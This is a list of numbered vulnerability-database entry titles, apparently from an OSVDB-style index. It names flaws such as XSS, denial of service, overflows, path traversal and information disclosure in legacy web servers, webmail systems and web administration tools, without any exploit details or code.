[13801] WebMaster ConferenceRoom IRC Server Clone Buddy Relationship Remote DoS
[13788] Open WebMail openwebmail.pl logindomain Parameter XSS
[13772] Gentoo Webmin miniserv.users Encrypted Root Password Remote Disclosure
[13770] IBM WebSphere Application Server (WAS) Encoded Space (%20) Request JSP Source Code Disclosure
[13755] PostACI Webmail System global.inc Direct Request Information Disclosure
[13749] Webteachers Webdata Import File Arbitrary File Access
[13694] NetWin dMailWeb / cwMail POP Server username Parameter DoS
[13693] NetWin dMailWeb / cwMail POP Server pophost Parameter DoS
[13683] Netwin DNews News Server DNEWSWEB QUERY_STRING Overflow
[13682] Netwin DMailWeb QUERY_STRING Remote Overflow
[13665] FileMaker Pro 5 Web Companion Arbitrary Mail Relay
[13655] WebObjects Developer WebObjects.exe HTTP Request Long Header Overflow
[13629] WebTV Email Client Stored Mail Access
[13621] Microsoft Outlook Web Access (OWA) owalogon.asp Redirection Account Enumeration
[13590] 602LAN SUITE Webmail Traversal Arbitrary File Upload
[13532] Savant Web Server HTTP Version Overflow
[13531] TinyWeb Server Malformed CGI Request DoS
[13455] Net-SNMP snmpnetstat Tool Interface List Request Parsing Remote Overflow
[13441] Microsoft Windows 2000 Security Interface Change Password Option Account Enumeration
[13433] Microsoft IIS WebDAV MKCOL Method Location Server Header Internal IP Disclosure
[13432] Microsoft IIS WebDAV WRITE Location Server Header Internal IP Disclosure
[13431] Microsoft IIS WebDAV Malformed PROPFIND Request Internal IP Disclosure
[13404] Novell NetWare Enterprise Web Server /com Directory Indexing
[13403] Novell NetWare Enterprise Web Server /com/novell/webaccess Directory Indexing
[13402] Novell NetWare Enterprise Web Server /com/novell/ Directory Indexing
[13385] Microsoft IIS WebDAV Long PROPFIND/SEARCH Request DoS
[13377] IceWarp WebMail importaction.html Arbitrary File Manipulation
[13376] IceWarp WebMail calendar_y.html id Variable Path Disclosure
[13375] IceWarp WebMail calendar_w.html id Variable Path Disclosure
[13374] IceWarp WebMail calendar_m.html id Variable Path Disclosure
[13373] IceWarp WebMail calendar_d.html id Variable Path Disclosure
[13372] IceWarp WebMail calendar_addevent.html Multiple Parameter XSS
[13371] IceWarp WebMail calendar_addtask.html Note Parameter XSS
[13370] IceWarp WebMail calendar_addnote.html Title Parameter XSS
[13369] IceWarp WebMail accountsettings_add.html accountid Parameter XSS
[13368] IceWarp WebMail login.html username Parameter XSS
[13344] Eternal Lines Web Server Connection Saturation DoS
[13324] Alt-N WebAdmin modalframe.wdm Arbitrary HTML Injection
[13323] Alt-N WebAdmin useredit_account.wdm Arbitrary Account Modification
[13322] Alt-N WebAdmin useredit_account.wdm user Parameter XSS
[13321] Captaris Infinite Mobile Delivery Webmail Path Disclosure
[13320] Captaris Infinite Mobile Delivery Webmail XSS
[13316] Novell NetWare websinfo.bas Information Disclosure
[13312] Novell NetWare Web Server env.pl Information Disclosure
[13311] Novell NetWare Web Server test.jse Information Disclosure
[13310] Novell NetWare Web Server allfield.jse Information Disclosure
[13309] RSA SecurID WebID Traversal Arbitrary File Access
[13308] RSA SecurID WebID sdiis.dll Direct Request DoS
[13307] RSA SecurID WebID Null Character Debug Mode Information Disclosure
[13306] Netscape / iPlanet Web Server ?wp-html-rend DoS
[13305] Netscape / iPlanet Web Server ?wp-force-auth Brute Force Weakness
[13296] Netscape Enterprise Server Manager Web Log Viewer JavaScript Injection
[13295] GoAhead WebServer Crafted File Request Script Source Disclosure
[13251] O'Reilly WebSite Pro uploader.exe Arbitrary Remote File Creation
[13246] Winmail Server Webmail Web Administration User Information XSS
[13234] WebWasher Classic Server Mode Arbitrary Proxy CONNECT Request
[13208] Mobius DocumentDirect Web Authorization Form Username Overflow DoS
[13178] CamShot WebCam Long Authorization Header Overflow
[13170] BRIBBLE webadmin Authentication Bypass
[13145] SquirrelMail webmail.php XSS
[13143] Trend Micro Control Manager Web Application Login Replay Weakness
[13142] Novell GroupWise WebAccess webacc Information Disclosure
[13141] Novell GroupWise WebAccess webacc Error Document Authentication Bypass
[13135] Novell GroupWise WebAccess Error Module Username XSS
[13134] Novell GroupWise WebAccess Error Module About Page XSS
[13090] Webodex CGI Script Remote File Inclusion
[13086] MySQL MaxDB Web Agent Malformed HTTP Header DoS
[13085] MySQL MaxDB Web Agent WebDAV sapdbwa_GetUserData() Function Remote DoS
[13021] Novell GroupWise WebAccess WebAccessUninstall.ini Information Disclosure
[12970] NetXRay web-admin Tool HTTP Request Overflow
[12963] O'Reilly WebSite Pro args.bat Arbitrary Command Execution
[12962] O'Reilly WebSite Pro args.cmd Arbitrary Command Execution
[12935] m0n0wall mini_httpd webGUI Server Malformed Connection DoS
[12919] MySQL MaxDB WebAgent websql Remote Overflow
[12880] Bottomline Webseries Arbitrary Report Execution
[12879] Bottomline Webseries Password Change Does Not Require Previous Credentials
[12878] Bottomline Webseries Password Restriction Bypass
[12877] Bottomline Webseries BTInteractiveViewer.asp File/Directory Enumeration
[12876] Bottomline Webseries SaveUser.asp Admin Authentication Bypass
[12875] Bottomline Webseries HTTP Variable Information Disclosure
[12874] eMotion MediaPartner Web Server Traversal Arbitrary File Access
[12873] eMotion MediaPartner Web Server XSS
[12872] eMotion MediaPartner Web Server BHTML Source Disclosure
[12871] eMotion MediaPartner Web Server Arbitrary User Password Change
[12800] iWebNegar conf_edit.php Arbitrary Code Injection
[12784] Dillo Web Browser file.c Unspecified Overflows
[12772] Rpm Finder (rpf) web() Procedure Remote Overflow
[12719] Jeuce Personal Web Server Malformed URL DoS
[12718] Jeuce Personal Web Server Traversal Arbitrary File Access
[12680] KorWeblog index.php G_PATH Variable Arbitrary Command Execution
[12679] KorWeblog index.php lng Parameter Arbitrary File Access
[12671] Nombas ScriptEase MiniWeb Server Long URL Overflow
[12559] SurgeMail Webmail Unspecified Security Issue
[12547] ASP Calendar main.asp Unauthorized Admin Interface Access
[12489] WebCalendar Multiple Unspecified Security Issues
[12488] WebCalendar Layer Functionality Arbitrary Content Access
[12487] WebCalendar nonuser Admin Unspecified Security Issue
[12486] WebCalendar read-only Permission Arbitrary Content Manipulation
[12467] uml-utilities Unprivileged eth0 Interface Disable DoS
[12462] pgn2web process_moves() Function PGN File Overflow
[12417] iWebNegar index.php string Parameter SQL Injection
[12406] Sun Java Messaging Server Webmail XSS
[12405] vWebServer Multiple Long URL Request DoS
[12404] vWebServer MS-DOS Device Name GET Request DoS
[12403] vWebServer Encoded Space (%20) Request Arbitrary ASP Script Disclosure
[12402] Hosting Controller Default AdvWebadmin Account
[12353] Sun Java System Web/Application Server Session ID Disclosure
[12309] Essentia Web Server Long URL Request Parsing Overflow DoS
[12307] Nombas ScriptEase Mini WebServer Malformed GET Request DoS
[12275] MySQL MaxDB Web Tools wahttp Nonexistent File Request DoS
[12274] MySQL MaxDB Web Tools WebDAV Handler Remote Overflow
[12273] WebLibs weblibs.pl Traversal Arbitrary File Access
[12231] Apache Tomcat web.xml Arbitrary File Access
[12223] Jana Web Server Encoded Traversal Arbitrary File Access
[12205] Savant Web Server File Parameter Overflow
[12204] Savant Web Server Host HTTP Header Overflow
[12185] IBM WebSphere Commerce Database Update Information Disclosure
[12179] Big Medium Web Directory Arbitrary File Upload
[12114] KorWeblog viewimg.php Arbitrary Directory Listing
[12101] Fastream NETFile FTP/Web Server HEAD Request Saturation DoS
[12088] SLWebMail3 globallogin.dll CompanyID Parameter Remote Overflow
[12087] SLWebMail3 admin.dll CompanyID Parameter Remote Overflow
[12086] SLWebMail3 recman.dll CompanyID Parameter Remote Overflow
[12085] SLWebMail3 showlogin.dll Language Parameter Remote Overflow
[12084] SLWebMail WebMailReq.dll Malformed Request Path Disclosure
[12074] aldweb miniPortail admin.php Cookie Manipulation Privilege Escalation
[12068] Mac OS 9 Personal Web Sharing Long HTTP Request Parsing Remote DoS
[12064] Lightwave ConsoleServer Admin Interface pre-login Mode Information Disclosure
[12061] WebGUI User Profile Unspecified Issue
[12055] Snowblind Web Server Malformed HTTP Request DoS
[12054] Snowblind Web Server Long HTTP Request Overflow
[12043] MDaemon WebConfig Server MSDOS Device Request DoS
[12041] MDaemon Webconfig IMAP Malformed URL DoS
[12038] MDaemon WebConfig Server HTTP URL Remote Overflow
[12034] MDaemon WebConfig HTTP Server URL Overflow Remote DoS
[11998] web-cp Unprivileged Alias Creation E-mail Interception
[11997] web-cp Duplicate Username Arbitrary Document Access
[11978] Google Desktop Search Web History Persistence
[11888] Polycom ViewStation Web Server Unicode Request Arbitrary File Access
[11869] iPlanet Web Server Search Component NS-rel-doc-name Parameter Remote Overflow
[11868] StepWeb Search Engine admin.html Password Disclosure
[11865] SCO UnixWare scohelphttp Web Server search97cgi/vtopic Traversal Arbitrary File Access
[11833] IceWarp WebMail Account Settings Unspecified Issue
[11802] Respondus for WebCT WEBCT.SVR File Weak Encryption
[11743] ipmasq External Interface Packet Forward Restriction Bypass
[11741] Foxweb foxweb.exe Long URL Remote Overflow
[11740] Foxweb foxweb.dll Long URL Remote Overflow
[11715] Webroot Spy Sweeper Enterprise Admin Password Local Disclosure
[11699] WEB-DAV Linux File System dav2fs Symlink Arbitrary File Overwrite
[11694] phpWebSite index.php HTTP Response Splitting
[11692] Roxen Web Server Enable Userlisting Failure
[11689] Roxen Web Server MySQL Socket Permission Weakness
[11688] Roxen Web Server Period Append pike Script Source Disclosure
[11687] Roxen Web Server Redirect Module Failure Information Disclosure
[11686] Roxen Web Server LDAP-userdb Authentication .htaccess Bypass
[11684] Roxen Web Server Auth API Failure Filesystem Privilege
[11683] Roxen Web Server Traversal Arbitrary File Access
[11682] Roxen Web Server Show Internal Errors Port Bind Arbitrary File Access
[11681] Roxen Web Server SQLuserdb.pike userinfo() Function SQL Injection
[11680] Roxen Web Server Admin Encrypted Password Local Disclosure
[11679] Roxen Web Server Overlayed Filesystem Security Pattern Content Disclosure
[11677] IMHO Webmail Module for Roxen REFERER Error Page Previous Login Session Disclosure
[11666] Multiple Web Server printenv CGI Information Disclosure
[11654] SAP DB web-tools Default Services Information Disclosure
[11640] Xitami Web Server /aux Request DoS
[11634] Netscape / iPlanet Multiple Web Publishing Tag Forced Directory Listing
[11621] GNATS GnatsWeb gnatsweb.pl Arbitrary Command Execution
[11620] WebCalendar upcoming.php Privilege Escalation
[11619] WebCalendar view_entry.php Privilege Escalation
[11618] WebCalendar validate.php Path Disclosure
[11617] WebCalendar init.php Crafted Request Path Disclosure
[11616] WebCalendar init.php user_inc Variable Arbitrary Command Execution
[11615] WebCalendar login.php HTTP Response Splitting
[11614] WebCalendar styles.php Multiple Parameter XSS
[11613] WebCalendar trailers.php user Parameter XSS
[11612] WebCalendar datesel.php Multiple Parameter XSS
[11611] WebCalendar usersel.php form Parameter XSS
[11610] WebCalendar view_d.php id Parameter XSS
[11609] WebCalendar view_entry.php id Parameter XSS
[11608] 04WebServer MS-DOS Device Name Request DoS
[11607] 04WebServer Log File Arbitrary Content Injection
[11606] 04WebServer Error Page XSS
[11583] Sun ONE Messaging Server Webmail Session Hijacking
[11576] NETGEAR DG834 Firewall Router Web Admin Connection Saturation DoS
[11565] IceWarp WebMail Account Password Storage Weak Encryption
[11564] IceWarp WebMail folders.html Arbitrary File/Directory Rename
[11563] IceWarp WebMail viewaction.html Arbitrary File Manipulation/Deletion
[11561] IceWarp WebMail viewaction.html Arbitrary Directory Creation
[11560] IceWarp WebMail folderitem.html folderold Parameter XSS
[11559] IceWarp WebMail attachment.html Multiple Parameter XSS
[11558] IceWarp WebMail send.html Multiple Parameter XSS
[11528] 602LAN SUITE Webmail POST Request CPU Consumption DoS
[11489] Network Flight Recorder (NFR) webd Overflow
[11485] BackWeb Polite Agent Protocol Race Condition Server Spoofing
[11481] WebRamp Malformed HTTP Request DoS
[11480] WebRamp Port 5353 Malformed UDP Packet Unauthorized IP Address Modification
[11460] Microsoft Windows RPC DCOM Interface epmapper Pipe Hijack Local Privilege Escalation
[11433] WebSiteTool Shopping Cart Hidden Form Field Arbitrary Data Manipulation
[11404] Sun ONE Web Server ClassCache Directories Permission Weakness
[11403] Sun ONE Web Server WebPub/Remote File Manipulation Feature Directory Listing
[11402] Sun ONE Web Server LDAP Wildcard Authentication
[11401] Sun ONE Web Server Accept-language Unspecified Issue
[11388] Web Forum Server .ini File Cleartext Password Disclosure
[11387] Web Forum Server Traversal Arbitrary File Access
[11383] Sun Java System Web / Application Server Malformed Client Certificate DoS
[11382] LakeWeb Filemail Recipient Address Command Execution
[11381] LakeWeb Mail List Recipient Address Command Execution
[11359] HP MPE/iX Architected Interface Facility (AIF) AIFCHANGELOGON Remote Privilege Escalation
[11358] HP Web JetAdmin Port 8000 Malformed URL Parsing Remote DoS
[11347] Cyberstop Web Server HTTP GET Request Parsing Remote DoS
[11346] Cyberstop Web Server MS-DOS Device HTTP Request DoS
[11345] Cyberscheduler websync.exe Timezone Variable Parsing Remote Overflow
[11322] MailEnable Professional Unspecified Webmail Issue
[11321] Cherokee Web Server auth_pam Authentication Format String
[11317] Compaq WEBES Service Tools Arbitrary Local File Access
[11304] Sun Java System Web Proxy Server Overflow
[11284] HP-UX VVOS iPlanet Web Server Unspecified Data Corruption Issue
[11269] OpenLink Web Configurator GET Request Remote Overflow
[11261] Sun Web-Based Enterprise Management (WBEM) World Readable Install Password
[11255] Caudium Web Server Malformed HTTP Request DoS
[11195] Cyber Web Filter IP Address Bypass
[11150] OpenWFE Web Client Port Scan Relay
[11149] OpenWFE Web Client Login Form XSS
[11093] Abyss Web Server abyss.conf Admin Cleartext Password Disclosure
[11092] Pi3Web Name Column Sorting Malformed URL DoS
[11091] Pi3Web Malformed GET Request Remote Overflow
[11090] Pi3Web Wildcard HTTP Request Arbitrary File Access
[11043] cPanel Webmail Truncated Password Weakness
[11006] Abyss Web Server MS-DOS Device Names DoS
[10994] Microsoft DirectX Files Viewer ActiveX Control xweb.ocx Overflow
[10980] FTP Voyager ActiveX Control IObjectSafety Interface Arbitrary Command Execution
[10946] SalesLogix slxweb.dll Database Information Disclosure
[10945] SalesLogix slxweb.dll/view id Parameter SQL Injection
[10944] SalesLogix slxweb.dll Invalid Filename Path Disclosure
[10928] Novell NetWare Perl Web Handler -v Option Information Disclosure
[10920] Novell NetWare Multiple Web Server HTTP GET Saturation DoS
[10918] Novell Web Server convert.bas URI Traversal Arbitrary File Access
[10894] Moby Netsuite Web Server Long HTTP Request Overflow
[10893] Easycom/Safecom Print Server Web Service HTTP Request Overflow
[10892] Netscape Enterprise Server Web Publishing Feature REVLOG Command DoS
[10891] Picserver Web Server Traversal Arbitrary File Access
[10889] 24Link Web Server Special Character GET Request Access Restriction Bypass
[10888] QNX 405 Voyager Web Server .photon Directory Information Disclosure
[10887] MERCUR WebView WebMail Server mail_user Parameter DoS
[10886] Sambar Web Server Long HTTP GET Request Overflow
[10885] iPlanet Web Server on Oracle ndwfn4.so HTTP Request Remote Overflow
[10884] BiblioWeb Web Server Long HTTP Request Overflow
[10882] Sun AnswerBook2 Web Server dwhttpd HTTP GET Request Format String DoS
[10881] QNX Voyager Web Server Embedded Resource Manager embedded.html Information Disclosure
[10880] Sun Java Web Server com.sun.server.http.pagecompile.jsp92.JspServlet Arbitrary Code Execution
[10879] Roxen Web Server htmlparse.pike RXML Recursive Parsing DoS
[10878] Sun AnswerBook2 Web Server dwhttpd Malformed Content-Length DoS
[10864] Marconi ASX-1000 Switches Multiple Interface Malformed Packet DoS
[10849] Ipswitch IMail Web Messaging Server Arbitrary User Information Modification
[10843] Ipswitch IMail Web Service Long URL Overflow
[10829] IBM Lotus Notes/Domino Web Retriever Client Long HTTP Status Line DoS
[10827] IBM Lotus Domino Web Server s_Validation Form Malformed Value Field POST Request DoS
[10824] IBM Lotus Domino Web Server h_PageUI Form Incomplete POST DoS
[10822] IBM Lotus Domino Question Mark HTTP Request Web Handler Bypass
[10819] IBM Lotus Domino Web Server $defaultNav Information Disclosure
[10818] IBM Lotus Domino Web Server Malformed GET Request Internal IP Address Disclosure
[10803] Webmin/Usermin miniserv.pl Base-64 String Metacharacter Handling Session Spoofing
[10802] Webmin/Usermin Auth Information Control Character Bypass Arbitrary User Authentication
[10765] Express-Web Content Management System default.asp Multiple Parameter XSS
[10745] CUPS HTTP Interface Remote Overflow
[10688] Microsoft Windows WebDAV XML Message Handler Malformed Request DoS
[10675] Squid Web Proxy Cache SNMP Module asn_parse_header() Function Remote DoS
[10674] IceWarp WebMail Multiple Unspecified XSS
[10673] IceWarp WebMail view.html File View Unspecified Issue
[10638] Turbo Traffic Trader Nitro ttt-webmaster.php Multiple Method XSS
[10532] MySQL MaxDB webdbm Server Field DoS
[10522] IBM DB2 Application Programming Interface Multiple Unspecified Overflow
[10505] ColdFusion Server Web Publish Example Script Access Restriction Bypass
[10489] NetworkActiv Web Server Encoded URL Request Remote DoS
[10469] PlanetDNS PlanetWeb HTTP Method Overflow
[10468] PlanetDNS PlanetWeb URL Overflow
[10448] WebTrends Reporting Center WTX_REMOTE.DLL /reports/ Remote Overflow
[10447] WebTrends Reporting Center get_od_toc.pl Path Disclosure
[10442] MyWebServer ServerProperties.html Arbitrary File Access
[10441] MyWebServer Multiple HTTP Connection DoS
[10423] Hosting Controller browsewebalizerexe.asp filepath Variable Arbitrary Directory Browsing
[10403] Novell NetMail ModWeb Remote Overflow
[10402] Novell NetMail WebAdmin Remote Overflow
[10355] Web Wiz Internet Search Engine search_engine.mdb Admin Password Disclosure
[10354] Web Wiz Journal journal.mdb Admin Password Disclosure
[10353] Web Wiz Internet Search Engine common.inc Admin Password Disclosure
[10350] Full Revolution aspWebCalendar User Enumeration
[10342] BEA WebLogic NodeManager Admin Privilege Escalation
[10341] BEA WebLogic Server DOS Device Request DoS
[10340] BEA WebLogic Server Internal Servlet Admin Authentication Bypass
[10335] Full Revolution aspWebAlbum album.asp SQL Injection
[10334] Full Revolution aspWebCalendar calendar.asp SQL Injection
[10321] Zope ZSearch Interface Query String XSS
[10269] Hummingbird CyberDOCS DM Web Server loginact.asp Path Disclosure
[10215] PostNuke CMS Web Links Module admin.php Path Disclosure
[10187] mySAP Web Dispatcher HTTP Host Header Remote Overflow
[10127] Microsoft SQL Server xp_runwebtask Procedure Privilege Escalation
[10112] CafeLog b2 Weblog Tool tablehosts Parameter SQL Injection
[10082] Novell WebServer Examples Toolkit 2 files.pl Arbitrary File Access
[10067] BEA WebLogic Double Dot GET Request Remote Overflow
[10066] phpWebLog common.inc.php $CONF Array Password Weakening
[10059] WebRamp M3 Router Telnet / HTTP Service Persistence
[10039] DNS4Me Web Server GET Request Overflow DoS
[10018] Business Objects InfoView for WebIntelligence File Upload Document Name XSS
[10017] Business Objects InfoView for WebIntelligence Options Pane Personalized Picture XSS
[10016] Business Objects WebIntelligence Restriction Bypass Arbitrary Document Deletion
[10015] BEA WebLogic JNDI Tree Object Unbinding DoS
[10014] BEA WebLogic JNDI Tree Object Information Disclosure
[10013] BEA WebLogic Administrative ant Task Cleartext Password Disclosure
[10012] BEA WebLogic command-line Utilities Cleartext Password Disclosure
[9978] BEA WebLogic Cleartext Administrative Information Transmission
[9977] BEA WebLogic Active Directory LDAP Account Lockout Bypass
[9976] BEA WebLogic Deployment Descriptor Policy/Role Failure
[9975] BEA WebLogic HTTP Header Version Information Disclosure
[9974] BEA WebLogic on Linux Command Line Admin Password Disclosure
[9973] BEA WebLogic web.xml URL Case Restriction Bypass
[9972] BEA WebLogic weblogic.Admin Arbitrary Command Execution
[9860] Excite for Web Servers Encrypted Password Weakness
[9859] Excite for Web Servers Architext.conf Encrypted Password Disclosure Local Privilege Escalation
[9858] Excite for Web Servers Architext.conf Permission Weakness Privilege Escalation
[9829] Savant Web Server HTTP GET Request Remote Overflow
[9826] Behold! Software Web Page Counter counter.exe Malformed HTTP Request Counter Log DoS
[9814] IceWarp WebMail folders.html Arbitrary File/Directory Rename
[9813] IceWarp WebMail viewaction.html Arbitrary File/Directory Move
[9812] IceWarp WebMail viewaction.html Arbitrary File Deletion
[9811] IceWarp WebMail accountsettings_add.html Arbitrary File Creation
[9810] IceWarp WebMail attachment.html Arbitrary E-mail Attachment Access
[9809] IceWarp WebMail topmenu.html Path Disclosure
[9808] IceWarp WebMail accountsettings_add.html Path Disclosure
[9807] IceWarp WebMail viewaction.html Arbitrary Directory Creation
[9806] IceWarp WebMail search.html Search String Parameter XSS
[9805] IceWarp WebMail accountsettings.html User Name Parameter XSS
[9791] iPROSITE Web Shop Manager Search Command Execution
[9782] Falcon Web Server Long Filename Path Disclosure
[9775] Webmin/Usermin Installation .webmin Symlink Local Privilege Escalation
[9767] WebRamp Web Administration Utility Default Password
[9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
[9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
[9681] IBM Informix Web DataBlade Input Filtering Weakness SQL Injection
[9680] IBM Informix Web DataBlade webdriver HTTP Request SQL Injection
[9679] IBM WebSphere Application Server (WAS) sas.server.props Cleartext Password Disclosure
[9677] IBM WebSphere/NetCommerce3 macro.d2w Macro Parsing Remote DoS
[9676] IBM WebSphere/NetCommerce3 macro.d2w Macro Path Disclosure
[9675] IBM WebSphere Plugin Host Header Request JSP Source Disclosure
[9666] IBM WebSphere ikeyman Database Password Storage Encryption Weakness
[9665] IBM WebSphere Script Permission Privilege Escalation
[9617] HP-UX iPlanet Web Server with VirtualVault HTTPS Remote DoS
[9554] Ipswitch IMail Web Messaging To: Line DoS
[9553] Ipswitch IMail Web Calendar Malformed Content DoS
[9548] ICQ Webserver Traversal Arbitrary File Access
[9544] ICQ WebFront Plug-in Malformed URL DoS
[9539] ICQ Web Front HTTPd Malformed URL Parsing Remote DoS
[9538] ICQ Web Front Service guestbook CGI URL Long Name DoS
[9497] Postaci Webmail PostgreSQL Version deletecontact.php item_id Parameter SQL Injection
[9479] Oracle Applications Web Report Review FNDWRR.exe URL Overflow
[9464] Oracle Web Cache Admin Module Multiple GET Request Method DoS
[9462] Oracle Application Server Web Cache webcached Local Privilege Escalation
[9461] Oracle Application Server Web Cache /webcache/webcache.xml Encrypted Password Local Disclosure
[9447] phpWebSite Administrator Forced Command Execution
[9446] phpWebSite Notes Module Multiple Field Script Injection
[9445] phpWebSite Comment Module CM_pid XSS
[9444] phpWebSite Calendar Module cal_template Parameter SQL Injection
[9416] Oracle Web Listener Hex Encoded URL Authentication Bypass
[9414] Oracle Webserver Configuration File Ownership Weakness
[9413] Oracle Webserver PL/SQL Stored Procedure GET Request DoS
[9411] Oracle Application Server Web Cache Multiple Period Request webcached DoS
[9404] D-Link DP-300 Web Server POST Request DoS
[9391] Xedus Webserver Traversal Arbitrary File Access
[9390] Xedus Webserver testgetrequest.x username Parameter XSS
[9389] Xedus Webserver TestServer.x username Parameter XSS
[9388] Xedus Webserver test.x username Parameter XSS
[9387] Xedus Webserver Connection Saturation DoS
[9357] Web Server Running In Unrestricted File System
[9333] Open UNIX/UnixWare webtop service_action.cgi -c Argument Privilege Escalation
[9332] Open UNIX/UnixWare webtop scoadminreg.cgi -c Argument Handling Local Privilege Escalation
[9278] News-TNK WEB Parameter XSS
[9277] Board-TNK WEB Parameter XSS
[9274] Dynix Webpac Unspecified SQL Injection
[9252] ASP-Nuke profile.asp Web Site URL XSS
[9249] Novell Web Search search Parameter XSS
[9241] Webmin/Usermin Authentication Error Page XSS
[9240] Critical Path inJoin iCon Admin Web Server Multiple Parameter XSS
[9225] IBM Web Traffic Express Caching Proxy Server Location: Header XSS
[9220] Sun ONE/iPlanet Web Server Admin Server Error Log XSS
[9219] CafeLog b2 Weblog Tool GPC Parameter XSS
[9175] Easy File Sharing Web Server HTTP Request Saturation DoS
[9174] Easy File Sharing Web Server disk_c Virtual Folder Request Arbitrary File Access
[9164] web-app.org WebAPP index.cgi Traversal Arbitrary File Access
[9151] Webmatic Unspecified Security Issues
[9105] Davenport WebDAV-CIFS Gateway XML DoS
[9103] Novell NetWare Web Manager Unspecified Issue
[9102] Ipswitch IMail Web Calendaring GET DoS
[9101] Ipswitch IMail Web Calendaring Content-Length DoS
[9099] Nihuo Web Log Analyzer Multiple Header Fields XSS
[9062] RealPlayer Web Server Port 1275 Traversal Arbitrary File Access
[9055] webMathematica MSPStoreID Parameter Traversal Arbitrary File Access
[9050] Essentia Web Server Double Dot Traversal Arbitrary File Access
[9045] IceWarp WebMail PHP Source Disclosure
[9044] IceWarp WebMail calendar.html schedule Parameter SQL Injection
[9043] IceWarp WebMail address.html Path Disclosure
[9042] IceWarp WebMail HTML Message Body XSS
[9041] IceWarp WebMail calendar.html Multiple Parameter XSS
[9040] IceWarp WebMail attachment.html attachmentpage_text_error Parameter XSS
[9039] IceWarp WebMail readmail.html folder Parameter XSS
[9038] IceWarp WebMail settings.html Multiple Parameter XSS
[9037] IceWarp WebMail address.html Multiple Parameter XSS
[9008] MyWebServer Invalid Directory Path Disclosure
[9001] Dinos Webserver CPU Consumption DoS
[8983] Cobalt Qube WebMail readmsg.php mailbox Parameter Traversal Arbitrary File Access
[8976] phpMyWebhosting pmwh.php password Parameter SQL Injection
[8959] Webmin Directory edit_action.cgi ../ Sequence Parsing Traversal Arbitrary File Access
[8956] Basilix Webmail basilix.php3 request_id[DUMMY] Parameter Traversal Arbitrary File Access
[8952] Dinos Web Server Encoded URI Request Arbitrary File Access
[8946] RadioBird WebServer 4 Everyone Encoded Double Dot Traversal Arbitrary File Access
[8942] Novell NetWare Web Handler for Perl Encoded URI Traversal Arbitrary File Access
[8934] WebServer 4 Everyone Double Dot Traversal Arbitrary File Access
[8908] Cisco VPN 3000 Concentrator HTML Interface Long URL DoS
[8850] Cisco ATA 186 Adaptor Web Configuration Remote Parameter Modification
[8849] Cisco ATA 186 Adaptor Web Configuration Remote Password Disclosure
[8828] Cisco 600 Series Routers Web-based Configuration Utility Persistence
[8805] Cisco IOS DFS Subinterface Access Control Bypass
[8800] Cisco IOS DFS Interface Switch Access Control Bypass
[8786] BackWeb Client Cleartext Proxy Password
[8785] Kolban Webcam32 Long URL Overflow
[8779] nPULSE Web Server Unspecified Issue
[8778] SAP DB Web Agent Administration Overflow
[8737] Tarantella Server ttawebtop.cgi Arbitrary Directory Listing
[8680] Sun AnswerBook2 Web Server dwhttpd shell metacharacters Remote Command Execution
[8679] Sun AnswerBook2 Web Server dwhttpd Arbitrary Account Creation
[8597] Clearswift MIMEsweeper for Web Arbitrary File Access
[8552] IceWarp WebMail WebAdmin autoresp.html Unspecified Issue
[8551] IceWarp WebMail EmailLogin Issue
[8547] IceWarp WebMail Web Admin User Password Disclosure
[8544] IceWarp Web Mail Unspecified Login Issue
[8543] IceWarp WebMail Address Book Full Name Parameter XSS
[8542] IceWarp WebMail selfaction.html Unspecified Issue
[8541] IceWarp WebMail Arbitrary Folder/File Manipulation
[8540] IceWarp WebMail IP Address Checking Unspecified Issue
[8539] IceWarp WebMail No Session ID Multiple Module Execution
[8538] IceWarp WebMail calendar.html Multiple Parameter XSS
[8537] IceWarp WebMail Unspecified SQL Injection
[8536] IceWarp WebMail Arbitrary File/Directory Rename
[8535] IceWarp WebMail Arbitrary Unauthenticated File/Directory Moving
[8534] IceWarp WebMail Arbitrary File Deletion
[8533] IceWarp WebMail Arbitrary Attachment Access
[8532] IceWarp WebMail Path Disclosure
[8531] IceWarp WebMail Arbitrary Directory Creation
[8530] IceWarp WebMail getusersession Unspecified Issue
[8529] IceWarp WebMail calendar/note/modify Unspecified Issue
[8528] IceWarp WebMail writemail Shortcuts Unspecified Issue
[8527] IceWarp WebMail foldertree HTML Validation Issue
[8526] IceWarp WebMail Static Session ID Arbitrary Account Hijack
[8513] Cobalt RaQ4 Administrative Interface overflow.cgi Command Execution
[8419] Bajie HTTP Web Server Remote Arbitrary File Disclosure
[8393] EMUMAIL EMU Webmail emumail.cgi XSS
[8371] Webbsyte Chat Connection Saturation DoS
[8370] Free Web Chat Connection Saturation DoS
[8369] Free Web Chat UserManager.java Null Pointer DoS
[8361] Kerio MailServer Webmail Unspecified Race Condition
[8311] Mozilla Browsers chrome/XML User Interface Spoofing
[8264] Hitachi Web Page Generator Error Page XSS
[8263] Hitachi Web Page Generator Error Page Remote Information Disclosure
[8262] Hitachi Web Page Generator Improper Access Remote DoS
[8260] Webcam Watchdog sresult.exe cam Parameter XSS
[8197] Sun Java System webapps-simple Application XSS
[8193] EasyWeb (EW) FileManager pathext Traversal Arbitrary File / Directory Access
[8190] Samba Web Administration Tool (SWAT) HTTP Basic Auth base64 Decoding Remote Overflow
[8186] Zeus Technologies Zeus Web Server Weak Encryption
[8181] LBE Web HelpDesk jobedit.asp id Parameter SQL Injection
[8180] Web+Center DoCustomerOptions.asp Cookie Object SQL Injection
[8130] Nucleus Arbitrary Weblog Access
[8091] WebKOM HTTP Referrer Session Key Disclosure
[8086] 4D WebSTAR Unspecified Web Server Issue
[8085] 4D WebSTAR Admin Application Connection Cancel DoS
[8084] 4D WebSTAR Admin Application Connection Password Menu DoS
[8083] 4D WebSTAR Malformed Search String Remote DoS
[8082] 4D WebSTAR Mail LDAP Port Connection Remote DoS
[8081] 4D WebSTAR Client Upload Path Overflow DoS
[8080] 4D WebSTAR Malformed Query Search DoS
[8079] 4D WebSTAR FTP Plug-In Malformed File DoS
[8078] 4D WebSTAR Web Page Source Disclosure
[8077] 4D WebSTAR Multiple AppleEvent CGI Hit DoS
[8066] netcfg Unprivileged Ethernet Interface Access DoS
[7958] BasiliX Webmail Content-Type Header XSS
[7956] Dr.Web Anti-virus scanMail() Function Unspecified Overflow
[7927] Gattaca Server 2003 web.tmpl Multiple Parameter XSS
[7924] Gattaca Server 2003 web.tmpl Language Variable CPU Consumption DoS
[7906] Microsoft IE WebBrowser ActiveX Object Clipboard Content Disclosure
[7900] Microsoft IE WebBrowser Control NavigateComplete2 Policy Bypass
[7873] Multiple Browser JavaScript Web Activity Disclosure
